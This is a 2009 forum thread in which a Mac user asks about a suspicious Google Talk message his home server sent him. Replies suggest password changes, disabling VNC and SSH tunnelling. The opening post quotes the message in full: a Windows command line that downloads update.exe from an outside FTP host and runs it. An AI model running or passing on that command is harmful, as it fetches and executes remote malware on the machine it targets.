Welcome to the MacNN Forums.

If this is your first visit, be sure to check out the FAQ by clicking the link above. You may have to register before you can post: click the register link above to proceed. To start viewing messages, select the forum that you want to visit from the selection below.

You are here: MacNN Forums > Community > MacNN Lounge > received an odd Google Talk message today- hacker?

received an odd Google Talk message today- hacker?
Thread Tools
abbaZaba
Mac Elite
Join Date: Jun 2006
Location: Pittsburgh
Status: Offline
Reply With Quote
Aug 3, 2009, 08:27 PM
 
so I have a mini that is on at all times basically acting as a server for various things that I do. I have adium running all the time signed in to a Google Talk account I just use for email to sign up for websites and whatnot. on my phone I have a google talk client that is signed into another google account (my main one, which is my full name). I use this to send messages to the mini, somewhat like taking notes or using it to remind me of something later, when I get home.

I was at work today and I received a message sent from the mini's account. here is the message:

cmd /c echo open upgrade2.myftp.org 21 >> ik &echo user temp temp >> ik &echo binary >> ik &echo get update.exe >> ik &echo bye >> ik &ftp -n -v -s:ik &del ik &update.exe &exit

echo You got owned
to me, it looks like someone was trying to execute commands through google talk to connect to an ftp server and download a file (update.exe) then send me a message telling me I got owned (what a loser).

can anyone shed some light on this? are my gmail accounts compromised in some way? the message was sent from the mini's account to my personal account with my full name which is a little disconcerting. I do not think anything was downloaded, at least I hope not.
     
gilp1n
Fresh-Faced Recruit
Join Date: Mar 2009
Status: Offline
Reply With Quote
Aug 3, 2009, 11:57 PM
 
Definitely looks like something sketchy is going on - if you haven't already, I would change both passwords to be safe. Also, reporting the activity to Google might be a good idea as well.

Best of luck!
     
shifuimam
Addicted to MacNN
Join Date: Aug 2006
Location: Somewhere in the Pacific Northwest
Status: Offline
Reply With Quote
Aug 4, 2009, 01:49 AM
 
http://ubuntuforums.org/showthread.php?t=980832

VNC (which is what Apple Remote Desktop is) may be the culprit here. Try disabling it and see what happens. You also might try using a different VNC server to remote into that machine, and make sure you've set a password.
( Last edited by shifuimam; Aug 4, 2009 at 01:55 AM. )
     
abbaZaba  (op)
Mac Elite
Join Date: Jun 2006
Location: Pittsburgh
Status: Offline
Reply With Quote
Aug 4, 2009, 02:18 AM
 
why would this show up through Adium via Google Talk if VNC is the culprit?
     
Rumor
Moderator
Join Date: Feb 2006
Location: on the verge of insanity
Status: Offline
Reply With Quote
Aug 4, 2009, 02:24 AM
 
It looks more like an exploit though Bonjour (that is what Gtalk uses, no?) and aimed for Windows machines. Changing your password would not hurt, but probably will not make a difference either. I get random spam through Adium via MSN, which I chalk up to random spam.
I like my water with hops, malt, hops, yeast, and hops.
     
abbaZaba  (op)
Mac Elite
Join Date: Jun 2006
Location: Pittsburgh
Status: Offline
Reply With Quote
Aug 4, 2009, 02:26 AM
 
google talk uses jabber.

but the message originated from the client that the mini logs in to, as in the mini sent this message to me somehow, which is confusing because I am unsure how that would be possible
     
Rumor
Moderator
Join Date: Feb 2006
Location: on the verge of insanity
Status: Offline
Reply With Quote
Aug 4, 2009, 03:23 AM
 
Jabber is what I meant, just been drinking a bit.

Chances are that your email got around (it does happen even if you are careful, mine has and it is unique, only two people in the US with my first and last name). Just block it from contacting you. There are more tech folk here that can help you block it that I can. Though, I bet it is a simple fix.
I like my water with hops, malt, hops, yeast, and hops.
     
Rumor
Moderator
Join Date: Feb 2006
Location: on the verge of insanity
Status: Offline
Reply With Quote
Aug 4, 2009, 03:24 AM
 
Check the access logs on the mini.
I like my water with hops, malt, hops, yeast, and hops.
     
shifuimam
Addicted to MacNN
Join Date: Aug 2006
Location: Somewhere in the Pacific Northwest
Status: Offline
Reply With Quote
Aug 4, 2009, 02:27 PM
 
Originally Posted by abbaZaba View Post
why would this show up through Adium via Google Talk if VNC is the culprit?
Your guess is as good as mine. I just Googled "echo You got owned", and all I'm seeing is stuff about an insecure VNC server being the root cause of this particular issue. Since it's trying to run a Windows command, it's some kind of bot doing the dirty work - probably using the jabber protocol to send messages to the victim.

If it happens again, and you have Apple remote desktop enabled, you might as well try disabling it and see if this keeps happening. Just a thought.
     
abbaZaba  (op)
Mac Elite
Join Date: Jun 2006
Location: Pittsburgh
Status: Offline
Reply With Quote
Aug 4, 2009, 05:55 PM
 
well I disabled the VNC and closed that port.

is there a third party VNC server for OSX? I dislike not being able to have access to VNC options like I do in TightVNC for windows. likewise for the SFTP server built into OSX. I'd really love to be able to change that port.
     
shifuimam
Addicted to MacNN
Join Date: Aug 2006
Location: Somewhere in the Pacific Northwest
Status: Offline
Reply With Quote
Aug 4, 2009, 11:17 PM
 
Vine VNC is what I use. It's much better than Apple remote desktop anyhow, since you can connect to it with far more options than what Apple provides. You can also make it use whatever port you want, and it's got a service module that runs so that you can VNC into your Mac even if a user account isn't logged in.

Vine Server (OSXvnc) | Get Vine Server (OSXvnc) at SourceForge.net
     
hayesk
Guest
Status:
Reply With Quote
Aug 5, 2009, 03:16 PM
 
Set your router to block all ports except the SSH port and make SSH tunnels whenever you want to access the server from outside your network.
     
abbaZaba  (op)
Mac Elite
Join Date: Jun 2006
Location: Pittsburgh
Status: Offline
Reply With Quote
Aug 5, 2009, 06:22 PM
 
Vine VNC is pretty dang awesome. I dunno how I never stumbled upon it before.

as for SSH tunneling everything: I can't really do that since I use the mini (server) as a seedbox for BT, a Quinn server, pulpTunes (to access music library), etc so I think it would be a hassle to make SSH tunnels for all these things, even if it was possible.

I definitely think it would be a good idea to create an SSH tunnel for VNCing into the mini though. I just have to figure out exactly how to do this.
     
hayesk
Guest
Status:
Reply With Quote
Aug 5, 2009, 08:00 PM
 
Well, for services that are for the public, it can't be done, but for any service that is just for you, you can make a quick script to make all of the tunnels, and then anytime you want to use them, just click on your script.
     
shifuimam
Addicted to MacNN
Join Date: Aug 2006
Location: Somewhere in the Pacific Northwest
Status: Offline
Reply With Quote
Aug 6, 2009, 08:20 AM
 
FWIW, I don't go that far with security on my machines, and my network is plenty secure. This is also including the fact that boyfriend serves online games from our network, so people know our IP and the various no-ip domains pointing to it. We haven't had any security breaches yet, in Windows or OS X.
     
   
Thread Tools
 
Forum Links
Forum Rules
You may not post new threads
You may not post replies
You may not post attachments
You may not edit your posts
BB code is On
Smilies are On
[IMG] code is On
HTML code is Off
Top
Privacy Policy
All times are GMT -4. The time now is 02:31 PM.
All contents of these forums © 1995-2017 MacNN. All rights reserved.
Branding + Design: www.gesamtbild.com
vBulletin v.3.8.8 © 2000-2017, Jelsoft Enterprises Ltd.,